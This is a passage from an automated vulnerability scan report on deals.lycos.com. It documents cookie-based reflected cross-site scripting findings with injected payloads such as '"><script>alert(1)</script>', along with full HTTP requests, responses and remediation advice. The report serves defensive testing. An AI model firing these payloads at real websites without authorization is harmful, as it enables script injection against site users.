P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/gaming-and-toys-186&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.278. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d8a5"%3balert(1)//fe2e4db2273 was submitted in the diktfc cookie. This input was echoed as 5d8a5";alert(1)//fe2e4db2273 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/gaming-and-toys-186 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d8a5"%3balert(1)//fe2e4db2273; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/gaming-and-toys-186",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d8a5";alert(1)//fe2e4db2273"
});
</script>
...[SNIP]...

1.279. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gifts-flowers-and-cards-218

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df85e"><script>alert(1)</script>a9f8ea40e17 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/gifts-flowers-and-cards-218&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adf85e"><script>alert(1)</script>a9f8ea40e17&amp;cj=1" alt="tracker" />
...[SNIP]...

1.280. http://deals.lycos.com/deals/category/gifts-flowers-and-cards-218 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gifts-flowers-and-cards-218

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0282"%3balert(1)//7489f873325 was submitted in the diktfc cookie. This input was echoed as e0282";alert(1)//7489f873325 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/gifts-flowers-and-cards-218 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae0282"%3balert(1)//7489f873325; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/gifts-flowers-and-cards-218",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae0282";alert(1)//7489f873325"
});
</script>
...[SNIP]...

1.281. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/health-and-beauty-228

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57630"%3balert(1)//273c00b5a44 was submitted in the diktfc cookie. This input was echoed as 57630";alert(1)//273c00b5a44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/health-and-beauty-228 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57630"%3balert(1)//273c00b5a44; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
e="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/health-and-beauty-228",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57630";alert(1)//273c00b5a44"
});
</script>
...[SNIP]...

1.282. http://deals.lycos.com/deals/category/health-and-beauty-228 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/health-and-beauty-228

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ec09"><script>alert(1)</script>ef66589da7f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/health-and-beauty-228 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/health-and-beauty-228&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2ec09"><script>alert(1)</script>ef66589da7f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.283. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7178c"%3balert(1)//f479da64e2a was submitted in the diktfc cookie. This input was echoed as 7178c";alert(1)//f479da64e2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/home-and-garden-196 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7178c"%3balert(1)//f479da64e2a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/home-and-garden-196",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7178c";alert(1)//f479da64e2a"
});
</script>
...[SNIP]...

1.284. http://deals.lycos.com/deals/category/home-and-garden-196 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574bb"><script>alert(1)</script>eefe4285fdf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/home-and-garden-196 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/home-and-garden-196&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A574bb"><script>alert(1)</script>eefe4285fdf&amp;cj=1" alt="tracker" />
...[SNIP]...

1.285. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca710"><script>alert(1)</script>8995098f657 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/lcd-tvs-424 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/lcd-tvs-424&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aca710"><script>alert(1)</script>8995098f657&amp;cj=1" alt="tracker" />
...[SNIP]...

1.286. http://deals.lycos.com/deals/category/lcd-tvs-424 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c8b4"%3balert(1)//c21369f207e was submitted in the diktfc cookie. This input was echoed as 8c8b4";alert(1)//c21369f207e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/lcd-tvs-424 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8c8b4"%3balert(1)//c21369f207e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/lcd-tvs-424",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8c8b4";alert(1)//c21369f207e"
});
</script>
...[SNIP]...

1.287. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c87eb"><script>alert(1)</script>48578ff097f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/movies-music-books-178 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/movies-music-books-178&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac87eb"><script>alert(1)</script>48578ff097f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.288. http://deals.lycos.com/deals/category/movies-music-books-178 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40639"%3balert(1)//4ac5d608389 was submitted in the diktfc cookie. This input was echoed as 40639";alert(1)//4ac5d608389 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/movies-music-books-178 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A40639"%3balert(1)//4ac5d608389; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
